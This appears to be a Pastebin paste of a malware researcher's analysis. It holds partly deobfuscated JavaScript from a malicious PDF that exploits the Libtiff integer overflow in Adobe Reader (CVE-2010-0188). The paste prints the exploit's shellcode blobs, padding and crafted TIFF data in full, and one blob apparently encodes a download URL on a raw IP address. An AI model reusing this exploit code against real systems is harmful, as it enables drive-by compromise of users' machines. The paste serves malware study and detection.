Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // MalwareMustDie - suspected 0day analysis...
- // after some obfuscations, ending up to the below values..
- // can't get the value of fkyhifxmy() yet...
- // another onfuscation data in here...
- //
- edlejemod = "6xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8Bci/vLw1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+vLxDbIC6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmujXzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljXxAThIr4zyEvMi/Klc464181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO728vNQk0/OB7FQKvby81rzWQkNs6TVZ1ujllXDcMcCYnOuNfE8W4zHLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX64vOk1WdaA5ZVw6zHAmLjt6418TxbjM7vWz9TSvN281M68ybw127BDybQz+6zURsYpWFS4vby81GFkkkDsVI+9vLzrQ2w/eLDjdX64vNTodhMtVCS9vLzW/NS8rLy81r3WvENsf+k1WVTkvby81NlT87nsVEG8vLyNde3tQ8msQ8mwQ8m07UNsdX6wvOk1WdROZ8gRVB68vLzUwvY/a+xUbby8vNa81Jm877wxsJhDybDtQ8m0Q2x1frS86TVZPVC0vry83I1n1MtXt51U1ry8vCrUsxui5epUJLy8vDHxQO3WtNZDQ2wtX/bU5tJnZ+pUPLy8vDHxRDEBREFDQ+3UvL68vOvWpUPJQENsLV+Z1HEwy03qVOe8vLxDi0Nsswq09dSOwrqc6lT0vLy87UOLQ2w3pDXgmKDddX/cjXzYN+yMN+6wN+6oN86UjUONfBD6OXzIsYDdwL6QnH1zsb17V1eHwJiYN/6sN67JZzX4mKDdfri83DfQmJg3+YA36LnEvVY39qQ35py9V1+I9TeIN71SjUONfEAQOHzIu31zsb17V0iHwJiUyV035pi9V9o3sPc35qC9Vze4N71UNfiYoN1+tLzU09K8vNTJztDR6FS/vLy85eV/1DLyslDUq3aX0lToQ0ND7FQ0Q0NDQ1zUq3aX0lT+Q0NDQ8iYuOxUzkNDQ364vGh0dHA6Ly83OC4xMTAuNjAuOTkvL29sZWdkZW15LnBocD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
- function tblefdr(o, k){ // blah..
- while (o.length < k){
- o += o
- }
- return o.substring(0, k)
- }
- fkyhifxmy(); <== the main
- function fkyhifxmy(){ // PoC of Libtiff integer overflow in Adobe Reader and
- // Acrobat CVE-2010-0188 is detected here...
- hboxwhkju = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
- neeynlkdi = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
- lfwfnldsc = "SUkqADggAACQ";
- eosjddjas = "kJCQ";
- vbnqhwdkk = "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////";
- function rvcorgs(){
- // mm = app.viewerVersion.toString(); // bypass this mm bullshit...
- // mm = mm.replace(".", "");
- // while (mm.length < 4){
- // mm += 0
- //}
- mm = 5110;
- ll = 10;
- return parseInt(mm, ll)
- }
- pxhnxcedi = rvcorgs(); // suspected parts..
- if (pxhnxcedi >= 8000){
- gjoegkdqt = lfwfnldsc;
- gjoegkdqt += tblefdr(eosjddjas, 2000);
- gjoegkdqt += edlejemod; // while feeding obfs data...
- gjoegkdqt += tblefdr(eosjddjas, 7736);
- gjoegkdqt += vbnqhwdkk;
- gjoegkdqt += (pxhnxcedi < 8201 ? hboxwhkju : neeynlkdi);
- esrmhkwko.rawValue = gjoegkdqt
- }
- return // won't burp a value.. must debug further in memory..
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement